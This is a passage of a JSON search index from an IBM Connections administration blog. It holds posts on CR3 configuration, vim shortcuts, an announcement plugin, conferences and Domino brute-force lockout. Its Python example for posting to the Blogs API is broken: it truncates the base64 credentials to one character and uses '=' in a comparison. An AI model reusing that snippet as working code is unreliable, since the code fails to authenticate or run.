added it and saved my change.\nAfter checkIn i got a validation error, first i thought the order of parameters was wrong and so i checked the mobile-config.xsd. Even in the xsd the parameter wasn’t mentioned. So i checked \u0026lt;connections-root\u0026gt;/mobile/mobile/mobile/mobile-config/mobile-config.xsd|xml and there the parameter (and the other new ones) is available. I’m sure that the update was finished successfully without errors, so i checked two other systems (Windows and Linux) with CR3 and there was the same behavior, the new parameters were not copied to LotusConnections-config. After manually copying the xml and xsd i could set the values and after restarting of mobile the new feature was available.\nWhen i enabled the feature the first time and i like the xml validation feature of checkIn and checkOut, so i used wsadmin to checkOut the mobile-config.xml\nI haven’t checked if the new parameter useLeadingWildcardForGroupTypeahed with LotusConnections-config.xml works, but it isn’t available in the xsd too and i can’t found it in the complete connections-root directory. Will try the next days.\n","excerpt":"\u003cp\u003eWithin the\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21902940\" target=\"_blank\"\u003efixlist \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n of\nthe new released CR3 of IBM Connections 5 there are several new\nconfiguration options mentioned. One of the interesting ones for me is\nthe mobile update parameter AllowRemoveAccount. The default value is\n“false” and your Connections environment still works before, but what’s\nchanged when you set this to true?\u003c/p\u003e\n\u003cp\u003eThe\n\u003ca href=\"http://www-01.ibm.com/support/knowledgecenter/SSYGQH_5.0.0/admin/overview/r_mobile_config_properties.dita?lang=en\" target=\"_blank\"\u003eofficial\ndocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is already uptodate and shows us:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWhen you set this option to true, accounts can be removed from a mobile\ndevice without requiring the user to login and without any authorization\ncheck. The user is asked to confirm the deletion of an account before it\nis removed.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-18-another-new-feature-with-ibm-connections-5-0-cr3/","title":"Another new feature with IBM Connections 5.0 CR3"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/wsadmin/","title":"Wsadmin"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/markdown/","title":"Markdown"},{"body":"I use markdown since years to create my articles or most of documentation stuff.\nIt’s really cool to edit the text files on all of my devices, synchronize them fast through various internet services and create HTML, PDF or even DOCX files out of this sources.\nUntil last week i converted the markdown sources with pandoc and pasted the html code to the different pages, where i need them. So i copy and paste it to IBM Connections, Evernote or WordPress . On WordPress i use a plugin now to render the markdown textes, but for IBM Connections i didn’t found a way.\nSo why not using the IBM Connections API to post html, or even convert the file on the fly and put the html automatically?\nPosting to IBM Connections Blogs with Python You can read a lot on the IBM Connections API in the [official documentation](http://www-10.lotus.com/ldd/lcwiki.nsf/xpAPIViewer.xsp?lookupName=IBM Connections 5.0 API Documentation#action=openDocument\u0026amp;res_title=IBM_Connections_API_overview_ic50\u0026amp;content=apicontent), i’m not a developer so i need normally practical examples to use this.\nHow to connect to IBM Connections REST API with Python? First we need the URL to connect to the Blogs API:\nurl = \u0026#39;https://greenhouse.lotus.com/blogs/stoeps/api/entries\u0026#39; In this case “stoeps” is the blog handle, the blog where i want to add my post. You find the blog handle when you open the blog through your browser and check the url:\nNow we need to authenticate, Connections API can be used with basic authentication, so we create a base64 encoded string of username and password:\nimport base64 encodedstring = base64.encodestring(\u0026#39;christoph.stoettner@stoeps.de\u0026#39;+\u0026#34;:\u0026#34;+\u0026#39;myCoolPassword\u0026#39;)[:1] auth = \u0026#34;Basic %s\u0026#34; % encodedstring To post we have to use a XML File or XML String, which contains a title and body of our post, the REST service needs a Content-type of application/atom+xml:\nxml = \u0026#39;\u0026#39;\u0026#39;\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;entry xmlns=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:app=\u0026#34;http://www.w3.org/2007/app\u0026#34; xmlns:snx=\u0026#34;http://www.ibm.com/xmlns/prod/sn\u0026#34;\u0026gt; \u0026lt;title type=\u0026#34;text\u0026#34;\u0026gt;That\u0026#39;s the title\u0026lt;/title\u0026gt; \u0026lt;content type=\u0026#34;html\u0026#34;\u0026gt;\u0026lt;![CDATA[\u0026lt;p\u0026gt;and some text for the body.\u0026lt;/p\u0026gt;]]\u0026gt;\u0026lt;/content\u0026gt; \u0026lt;/entry\u0026gt;\u0026#39;\u0026#39;\u0026#39; Now let’s connect to the REST service with urllib2 and post the xml string.\nimport urllib2 request = urllib2.Request( url ) request.add_data( xml ) # add_data changes Method to POST request.add_header( \u0026#39;Content-type\u0026#39;, \u0026#39;application/atom+xml\u0026#39; ) request.add_header( \u0026#39;Authorization\u0026#39;, auth ) response = urllib2.urlopen( request ) # let\u0026#39;s check return code if response.code = 201: print \u0026#39;Post successfully created\u0026#39; Some more We have seen that we can post a xml with title and body. There are more possible ways to get a html string for our post.\nI changed the xml variable to fill two variables with title and body.\npostTitle = \u0026#39;A cool API post to blogs\u0026#39; postBody = \u0026#39;\u0026#39;\u0026#39;\u0026lt;p\u0026gt;This is the body of our Blogs post, we can use html tags here\u0026lt;/p\u0026gt; \u0026lt;h2\u0026gt;Fill text to show more content\u0026lt;/h2\u0026gt; \u0026lt;p\u0026gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. In commodo posuere ante, ut faucibus enim sagittis ut. Fusce scelerisque arcu quis mattis fringilla. Pellentesque a est enim. Nam congue sem eget augue porttitor semper. Fusce luctus sit amet ligula sit amet viverra. Cras pulvinar arcu eget velit volutpat, in condimentum nunc luctus. Vivamus vestibulum ante et nisl venenatis consequat. Aliquam ut augue nec lectus sodales eleifend eleifend nec orci.\u0026lt;/p\u0026gt;\u0026#39;\u0026#39;\u0026#39; xml = \u0026#39;\u0026#39;\u0026#39;\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;entry xmlns=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:app=\u0026#34;http://www.w3.org/2007/app\u0026#34; xmlns:snx=\u0026#34;http://www.ibm.com/xmlns/prod/sn\u0026#34;\u0026gt; \u0026lt;title type=\u0026#34;text\u0026#34;\u0026gt;\u0026#39; + postTitle + \u0026#39;\u0026lt;/title\u0026gt; \u0026lt;content type=\u0026#34;html\u0026#34;\u0026gt;\u0026lt;![CDATA[\u0026#39; + postBody + \u0026#39;]]\u0026gt;\u0026lt;/content\u0026gt; \u0026lt;/entry\u0026gt;\u0026#39;\u0026#39;\u0026#39; You see you can add html code to the variable postBody. You can read from a html file with:\npostBody = open(\u0026#39;post.html\u0026#39;).read() Or you can convert a markdown file to html:\nimport markdown2 markdownFile = \u0026#39;post.md\u0026#39; postBody = markdown2.markdown_path( markdownFile ) In my script here i added a function to read the first line of the markdown to set it as title and i added a function to find images integrated in the article, upload them to stoeps/api/media and replace the img src= tag.\nSo this post is completely written in markdown and i posted it through python to Greenhouse. Here is the link to the post .\n","excerpt":"\u003cp\u003eI use \u003ca href=\"http://daringfireball.net/projects/markdown/\" target=\"_blank\"\u003emarkdown \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n since years\nto create my articles or most of documentation stuff.\u003c/p\u003e\n\u003cp\u003eIt’s really cool to edit the text files on all of my devices,\nsynchronize them fast through various internet services and create HTML,\nPDF or even DOCX files out of this sources.\u003c/p\u003e\n\u003cp\u003eUntil last week i converted the markdown sources with pandoc and pasted\nthe html code to the different pages, where i need them. So i copy and\npaste it to IBM Connections, \u003ca href=\"http://www.evernote.com\" target=\"_blank\"\u003eEvernote \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or\n\u003ca href=\"http://www.wordpress.com\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. On WordPress i use a plugin now to\nrender the markdown textes, but for IBM Connections i didn’t found a\nway.\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-08-10-using-markdown-with-ibm-connections-blogs/","title":"Using markdown with IBM Connections Blogs"},{"body":"Julius Schwarzweller wrote a blog post with a collection of links to CR3 for IBM Connections 5.0 this week. A official update document with new features is missing.\nI installed it today (without CCM) and the first new feature i found is “sharing folders” with Communities:\nAs shown in the screenshot only public folders can be added to community files widget.\nFrom files application you can still share a folder with people, groups and communities (but then the folder will be public available too):\n","excerpt":"\u003cp\u003e\u003ca href=\"http://techblog.gis-ag.info/2015/07/21/ibm-connections-5-cr3-released/\" target=\"_blank\"\u003eJulius\nSchwarzweller wrote a blog post with a collection of links to CR3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\nIBM Connections 5.0 this week. A official update document with new\nfeatures is missing.\u003c/p\u003e\n\u003cp\u003eI installed it today (without CCM) and the first new feature i found is\n“sharing folders” with Communities:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2015/07/22-07-_2015_21-57-33.png\" alt=\"22 07 2015 21 57 33\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eAs shown in the screenshot only public folders can be added to community\nfiles widget.\u003c/p\u003e\n\u003cp\u003eFrom files application you can still share a folder with people, groups\nand communities (but then the folder will be public available too):\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2015/07/22-07-_2015_22-12-05.png\" alt=\"22 07 2015 22 12 05\" /\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-07-22-ibm-connections-5-0-cr3-is-available/","title":"IBM Connections 5.0 CR3 is available – new feature"},{"body":"Social Connections 8 ended some hours ago and first I want to thank the organization team ! It was a great job and an awesome conference you built here. The speaker gift was an absolute great idea!\nIt was the first time Social Connections headed to the United States and the location at IBM Boston was a well made decision. I visited the Boston area the first time and enjoyed all the days.\nI already arrived on Sunday evening and had the pleasure to stay with Victor and his family until we headed to Boston. Thanks for the hospitality!\nOpening session speaker Susan Livingston showed great new stuff around IBM Connections and IBM Verse. I think the most important is the planned function of synchronizing IBM Connections Files based on folders. Nested folder functionality is nice, i know that lots of people asking for this, but in my opinion i prefer to tag files and give me more possible keywords to find content.\nEditor enhancements sound really good, i hope that all these functions will appear in all IBM Connections application, to get a continuous experience.\nDuring the conference I had two sessions:\nBut the most important i met lovely people! Most of them i know online since years and we follow each other, discuss on several chats or share information through several blogs.\nOliver Heinz made perfect photos during the event and I’m sure they will be published on Flickr soon.\nYou can find some of my pictures in my Flickr Album .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 8 ended some hours\nago and first I want to thank the\n\u003ca href=\"https://twitter.com/Colleeni/status/589154980663177216/photo/1\" target=\"_blank\"\u003eorganization\nteam \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n! It was a great job and an awesome conference you built here. The\nspeaker gift was an absolute great idea!\u003c/p\u003e\n\u003cp\u003eIt was the first time Social Connections headed to the United States and\nthe location at IBM Boston was a well made decision. I visited the\nBoston area the first time and enjoyed all the days.\u003c/p\u003e\n\u003cp\u003eI already arrived on Sunday evening and had the pleasure to stay with\n\u003ca href=\"http://notesbusters.com/\" target=\"_blank\"\u003eVictor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and his family until we headed to\nBoston. Thanks for the hospitality!\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-04-18-social-connections-8-boston/","title":"Social Connections 8 Boston"},{"body":"Many of you know that i like VI/http://vim.org[VIM] and when i say editor it must be VIM. Often i hear at customer sites or from my colleagues, that they can’t work with vi, that shortcuts are hard to remember or even they can’t save their changes.\nWhen you remember some short commands, you can work very fast and you can edit files through all connections (ssh, x-forward) to a server.\nI created a mindmap as preparation for a speedgeeking session, the session wasn’t accepted, but the file is already done. So you can download a cheat-mindmap with a collection of shortcuts. Navigate in files Shortcuts in command mode:\ngg – top of file\nG – end of file\n: – =number go to line number\n0 – beginning of line\n$ – end of line\nSave and undo :w – save file\n:wq – save and close\n:q! – close and do not safe\nu – Undo\nSome additional things When i need to change Connections URLs within LotusConnections-config.xml after adding the webserver to my ISC, i can do this with one line.\nChanging Connections URLs Checkout LotusConnections-config.xml and edit with vim. You will find several links to your application server hostname with WebSphere ports (e.g. http://washost1.example.com:9081 ). When you use a large deployment you have about 15 application servers with http and https links, so you need to change 30 different urls.\nWith vim we can use regular expressions to change the urls. Lets change washost1.example.com:anyport to connections.example.com.\nOpen LotusConnections-config.xml with vim and stay in command mode. Type\n:%s/washost1.example.com:9[0-9]*/connections.example.com/g :%s is search and replace,\nfirst part within / / is text which will be replaced\n[0-9]* any count of a number\ng global replace (multiple search text in one line)\nComment out some lines in httpd.conf I often test things in my IBM HTTP Server Configuration and when i want to comment out some lines or remove the comment signs there is a easy way with vim.\nOpen httpd.conf and hit Ctrl+V (enters Visual Block mode),\nnow you can mark some characters with j (moves cursor down) or arrow keys:\nNow type a capital i → Shift+i, the cursor jumps back to the first character you marked and you can add text (e.g. “# “):\nfinish the commands with ESC:\nRemove characters in multiple lines You can remove the comments with nearly the same command.\nOpen the file, change to visual block mode (ctrl+v), mark the characters with arrow keys and remove with d.\n","excerpt":"\u003cp\u003eMany of you know that i like VI/http://vim.org[VIM] and when i say\neditor it must be VIM. Often i hear at customer sites or from my\ncolleagues, that they can’t work with vi, that shortcuts are hard to\nremember or even they can’t save their changes.\u003c/p\u003e\n\u003cp\u003eWhen you remember some short commands, you can work very fast and you\ncan edit files through all connections (ssh, x-forward) to a server.\u003c/p\u003e\n\u003cp\u003eI created a mindmap as preparation for a speedgeeking session, the\nsession wasn’t accepted, but the file is already done. So you\n\u003ca href=\"/images/2015/02/VIM-cheat-mindmap.pdf\"\u003ecan\ndownload a cheat-mindmap with a collection of shortcuts.\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-02-13-some-shortcuts-with-vim/","title":"Some shortcuts with vim"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ssh/","title":"SSH"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vi/","title":"Vi"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vim/","title":"Vim"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/connected/","title":"ConnectED"},{"body":"Last week i was at ConnectED 2015 in Orlando. I enjoyed the event very much, mainly because i met great old and new friends. The Lotus community is one of the best i’ve ever met, or i ever was part of.\nAfter coming home i found out that i have a flu and the headache and need of sleep is not age dependent. So the visits to kimonos and dolphin bar are a little bit shorter than last year, but i enjoyed them nevertheless.\nI did a session during ConnectED 2015, see the last version of slides here:\nToday i read in Anderl Artners Blog , that he provides some Assembly Lines for TDI/SDI , which can help you with SPNEGO and mailintegration. Thanks for that!\n","excerpt":"\u003cp\u003eLast week i was at ConnectED 2015 in Orlando. I enjoyed the event very\nmuch, mainly because i met great old and new friends. The Lotus\ncommunity is one of the best i’ve ever met, or i ever was part of.\u003c/p\u003e\n\u003cp\u003eAfter coming home i found out that i have a flu and the headache and\nneed of sleep is not age dependent. So the visits to kimonos and dolphin\nbar are a little bit shorter than last year, but i enjoyed them\nnevertheless.\u003c/p\u003e\n\u003cp\u003eI did a session during ConnectED 2015, see the last version of slides\nhere:\u003c/p\u003e\n\u003cp\u003eToday i read in \u003ca href=\"http://tdiblog.anderls.com\" target=\"_blank\"\u003eAnderl Artners Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, that he\nprovides\n\u003ca href=\"http://tdiblog.anderls.com/2015/02/adding-user-active-directory.html\" target=\"_blank\"\u003esome\nAssembly Lines for TDI/SDI \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which can help you with SPNEGO and\nmailintegration. Thanks for that!\u003c/p\u003e","ref":"https://stoeps.de/posts/2015/2015-02-04-ibm-connected-2015-short-review-presentation-and-addon/","title":"IBM ConnectED 2015 – short review, presentation and addon"},{"body":"Last week i searched a way to send all Connections users an information on important updates, which should be configurable and uses cookies to hide it for a specific time.\nFirst i had a look at the Greenhouse Announcement Widget which is used within Greenhouse .\nQuite nice, but i had problems with IE 9 users and the popup appears on each page you open within Connections. So i tried something other.\nAfter some searching i found a script of Ollie Phillips which is originally used to inform users about Cookie usage on the site. Ollie published the cookiesDirective.js under the MIT License. When you find the announcement slider useful, please buy him a beer .\nI took the script and put it to a osgi bundle and added some configuration parameters.\nIf you want to test it, , please use the updated archive! Download link see last point in this post!\nInstallation Unarchive the package and copy de.stoeps.announcement_1.0.0.jar to your Connections customization folder/provision/webresources and the folder de (and all content below) to customization/javascript.\nThe text which is shown within the slider can be edited within customization/javascript/de/stoeps/announcement/popup.txt. You can use html code and links within this text file. So you can add links to additional informations.\nBackground color backgroundColor: '#CACACA', button text (buttonTextPre \u0026amp; buttonTextPost) and opacity (set backgroundOpacity: '99' to show a solid color) is configured in customization/javascript/de/stoeps/announcement/initialize.js\nThe announcement can be disabled with announcementEnabled: 'false'.\ncookieLiveTime: 2 set the cookie to 2 days, so your users get the announcement again after 2 days and must confirm with the button.\nAfter installation and after changes in initialize.js you must restart Common Application.\nUpdate Klaus and Rainer mentioned problems with german language within the browsers. So i renamed the plugin from de.stoeps to org.scripting101.\nPlease use the following archive to install the announcement osgi plugin!\nannouncement-osgi-1.0.1 Installation and customization is nearly the same, only the path within customization/javascript changes from de/stoeps to org/scripting101!\nThanks for testing guys.\n","excerpt":"\u003cp\u003eLast week i searched a way to send all Connections users an information\non important updates, which should be configurable and uses cookies to\nhide it for a specific time.\u003c/p\u003e\n\u003cp\u003eFirst i had a look at the\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/assetDetails.xsp?action=editDocument\u0026amp;documentId=CD9C52D5287E82E285257A83005BF10D\" target=\"_blank\"\u003eGreenhouse\nAnnouncement Widget \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n which is used within\n\u003ca href=\"http://greenhouse.lotus.com\" target=\"_blank\"\u003eGreenhouse \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2014/12/2014-12-19_16-46-41.png\" alt=\"2014 12 19 16 46 41\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eQuite nice, but i had problems with IE 9 users and the popup appears on\neach page you open within Connections. So i tried something other.\u003c/p\u003e\n\u003cp\u003eAfter some searching i found a \u003ca href=\"http://cookiesdirective.com/\" target=\"_blank\"\u003escript of\nOllie Phillips \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n which is originally used to inform users about Cookie\nusage on the site. Ollie published the cookiesDirective.js under the MIT\nLicense. When you find the announcement slider useful,\n\u003ca href=\"http://cookiesdirective.com/index.php#whosbehind\" target=\"_blank\"\u003eplease buy him a beer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-12-19-announcement-plugin-for-ibm-connections/","title":"Announcement plugin for IBM Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/customizing/","title":"Customizing"},{"body":"Today IBM announced the session agenda for IBM ConnectED 2015 .\nI’m really interested in the new concept of more technical content and hope that all attendees will enjoy the format of the smaller designed event.\nMy session “BP203: Best And Worst Practices in Deploying IBM Connections” is accepted and i’m proud and happy to go to Orlando in january 2015 again.\nIf you haven’t already registered, follow this link .\nHere some points of my planned agenda for this session: Depending on deployment size, operating system and security considerations you have different options to configure IBM Connections.\nThis session will show worst practices examples from multiple customer deployments of IBM Connections. I will describe things I found and how you can optimize your systems.\nMain topics include:\nDo’s and Don’ts during IBM Connections deployments\nsimple (documented) tasks that should be applied\nmissing documentation\nautomated user synchronization, TDI solutions and user synchronization\nperformance tuning\nsecurity optimizing and planning\nSingle Sign On for mail, IBM Sametime and SPNEGO.\n","excerpt":"\u003cp\u003eToday IBM announced the\n\u003ca href=\"https://www-950.ibm.com/events/global/ibmced/agenda/preview.html\" target=\"_blank\"\u003esession\nagenda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\n\u003ca href=\"http://www-01.ibm.com/software/collaboration/events/connected/\" target=\"_blank\"\u003eIBM\nConnectED 2015 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI’m really interested in the new concept of more technical content and\nhope that all attendees will enjoy the format of the smaller designed\nevent.\u003c/p\u003e\n\u003cp\u003eMy session\n\u003ca href=\"https://www-950.ibm.com/events/global/ibmced/agenda/preview.html?sessionid=-BP203\" target=\"_blank\"\u003e“BP203:\nBest And Worst Practices in Deploying IBM Connections” \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is accepted and\ni’m proud and happy to go to Orlando in january 2015 again.\u003c/p\u003e\n\u003cp\u003eIf you haven’t already registered, follow this\n\u003ca href=\"http://www.ibm.com/software/collaboration/events/connected/\" target=\"_blank\"\u003elink \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003ch1 id=\"here-some-points-of-my-planned-agenda-for-this-session\"\u003eHere some points of my planned agenda for this session: \u003ca href=\"#here-some-points-of-my-planned-agenda-for-this-session\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDepending on deployment size, operating system and security\nconsiderations you have different options to configure IBM Connections.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-12-10-ibm-connected-2015-session-best-and-worst-practices-in-deploying-ibm-connections/","title":"IBM ConnectED 2015 – Session “Best and Worst Practices in deploying IBM Connections”"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibm-champion/","title":"IBM Champion"},{"body":"IBM announced the new and returning IBM Champions Class for IBM Collaboration Solutions. I’m really proud that I was nominated and elected this year again. Thanks!\nSo i see forward to IBM ConnectED 2015 to meet the other 95 IBM Champions. Big congratulations to all of them. Special thanks to Oli and Amanda , they are open for questions nearly all day and supports us within IBM.\nWhat’s an IBM Champion? Good explanation can be found on the nomination post:\nThese individuals are non-IBMers who evangelize IBM solutions, share their knowledge and help grow the community of professionals who are focused on social business and IBM Collaboration Solutions. IBM Champions spend a considerable amount of their own time, energy and resources on community efforts — organizing and leading user group events, answering questions in forums, contributing wiki articles and applications, publishing podcasts, sharing instructional videos and more!\n","excerpt":"\u003cp\u003e\u003ca href=\"https://www.ibm.com/developerworks/community/blogs/ibmchampion/entry/announcing_the_2015_class_of_ibm_champions_for_ics?lang=en\" target=\"_blank\"\u003eIBM\nannounced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the new and returning IBM Champions Class for IBM\nCollaboration Solutions. I’m really proud that I was nominated and\nelected this year again. Thanks!\u003c/p\u003e\n\u003cp\u003eSo i see forward to\n\u003ca href=\"http://www-01.ibm.com/software/collaboration/events/connected/\" target=\"_blank\"\u003eIBM\nConnectED 2015 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to meet the other 95 IBM Champions. Big congratulations\nto all of them. Special thanks to \u003ca href=\"http://twitter.com/oliheinz\" target=\"_blank\"\u003eOli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"http://twitter.com/amandabaumann\" target=\"_blank\"\u003eAmanda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, they are open for questions\nnearly all day and supports us within IBM.\u003c/p\u003e\n\u003ch1 id=\"whats-an-ibm-champion\"\u003eWhat’s an IBM Champion? \u003ca href=\"#whats-an-ibm-champion\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eGood explanation can be found on the nomination post:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThese individuals are non-IBMers who evangelize IBM solutions, share\ntheir knowledge and help grow the community of professionals who are\nfocused on social business and IBM Collaboration Solutions. IBM\nChampions spend a considerable amount of their own time, energy and\nresources on community efforts — organizing and leading user group\nevents, answering questions in forums, contributing wiki articles and\napplications, publishing podcasts, sharing instructional videos and\nmore!\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-12-10-ibm-champions-2015-for-ics/","title":"IBM Champions 2015 for ICS"},{"body":"Since years i think that the Internet Lockout Feature of IBM Domino is not enough. The function is documented here: IBM Domino Administrator Help Cite of this document:\nThere are some usage restrictions for Internet password lockout: You can only use Internet password lockout with Web access. Other Internet protocols and services, such as LDAP, POP, IMAP, DIIOP, IBM® Lotus® Quickr®, and IBM Sametime® are not currently supported. However, Internet password lockout can be used for Web access if the password that is used for authentication is stored on an LDAP server\nSo documentation tells us, that only HTTP can be secured through inetlockout.nsf and over years the documentation was right. So protocols like LDAP, SMTP or POP3 are prone to dictionary attacks.\nLast week at a customer site i can’t login into IBM Connections, even with the right spelled password. After checking the Domino server i found that the user has an entry in the inetlockout.nsf database. That was the first time that i had this behavior, Domino server was version 8.5.3.\nToday i had some spare time and checked the other protocols of my demo server for my AdminCamp sessions next week.\nSo i secured SMTP, POP3 and IMAP for authentication and started to use the wrong password for login and i tried to test wrong passwords on LDAP authenticated Sametime and Connections. What should i say? I was lockedout through all protocols! Martin Leyrer points me to following technote , where the feature is mentioned to secure SMTP against brute force. That’s the only document i can find where the extended inetlockout is mentioned or documented. I don’t know how many of my customers or friends asks for this feature, but we talked often about this. That’s a feature we asked long time and which is really important for all deployments of Domino with internet access. Now all important protocols are save against brute force or dictionary attacks.\nSo great news, but the documentation must be updated and the feature must be officially announced.\nWhy?\nIt is a really important security feature\nIf you use already inetlockout for http and you update your Domino server, the feature is active without any additional work! Good for security, but your helpdesk team could be a little bit surprised.\nWhich Domino version first had this code icluded?\nWhen you want to know how to deploy the lockout feature, please read documentation and this technote .\nUpdate: I got a mail that with 8.5.3 FP6 only SMTP and LDAP are working with inetlockout. I can’t test this in the moment, but with 9.0.1 pop3 and imap are secured too. Need to test this back with lower version and diiop.\nnginx You can use nginx as a reverse proxy for mail protocols . So this is a way to add SHA256 enabled certifiers in front of your domino servers.\n","excerpt":"\u003cp\u003eSince years i think that the Internet Lockout Feature of IBM Domino is\nnot enough. The function is documented here:\n\u003ca href=\"http://www-12.lotus.com/ldd/doc/domino_notes/9.0/help9_admin.nsf/f4b82fbb75e942a6852566ac0037f284/bd211a25c369e2e085257b19005b4d79?OpenDocument\" target=\"_blank\"\u003eIBM\nDomino Administrator Help \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eCite of this document:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThere are some usage restrictions for Internet password lockout: You can\nonly use Internet password lockout with Web access. Other Internet\nprotocols and services, such as \u003cstrong\u003eLDAP, POP, IMAP, DIIOP, IBM® Lotus®\nQuickr®, and IBM Sametime® are not currently supported\u003c/strong\u003e. However,\nInternet password lockout can be used for Web access if the password\nthat is used for authentication is stored on an LDAP server\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eSo documentation tells us, that only HTTP can be secured through\ninetlockout.nsf and over years the documentation was right. So protocols\nlike LDAP, SMTP or POP3 are prone to dictionary attacks.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-09-26-securing-domino-protocols-against-brute-force-attacks/","title":"Securing Domino Protocols against Brute Force Attacks"},{"body":"So my vacation is finished, i enjoyed 13 lovely rainy days in bavaria and see forward to my next travels. Hope to get some sun at ICON UK in London next week.\nI will speak with Sharon about Tips and Scripts for your daily business our session we made for Connect 2014 and which is updated for IBM Connections 5 now.\nAdmincamp will be at 29th september to 1st october in Gelsenkirchen. Admincamp is a great event with lots of technical content and no advertises, organized by Rudi Knegt and some more . I enjoy it very much to be again part of it, this year i will prepare three sessions with Klaus Bild .\n41st DNUG will be at 11. and 12. November in Leipzig. I made some session proposals and will see if i can speak there and meet the german ICS community.\nLast but not least Social Connections VII will be in Stockholm at 13th and 14th november. Agenda is still open, but i made a session proposal and see forward to meet the Connections User group there.\n","excerpt":"\u003cp\u003eSo my vacation is finished, i enjoyed 13 lovely rainy days in bavaria\nand see forward to my next travels. Hope to get some sun at\n\u003ca href=\"http://iconuk.org\" target=\"_blank\"\u003eICON UK \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in London next week.\u003c/p\u003e\n\u003cp\u003eI will speak with \u003ca href=\"http://cube-soft.co.uk/blog/\" target=\"_blank\"\u003eSharon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n about\n\u003ca href=\"http://iconuk.org/iconuk/iconuk2014.nsf/session.xsp?action=openDocument\u0026amp;documentId=D46A8FE17AEF4D1580257CE00066F281\" target=\"_blank\"\u003eTips\nand Scripts for your daily business \u003ci class=\"las la-external-link-alt 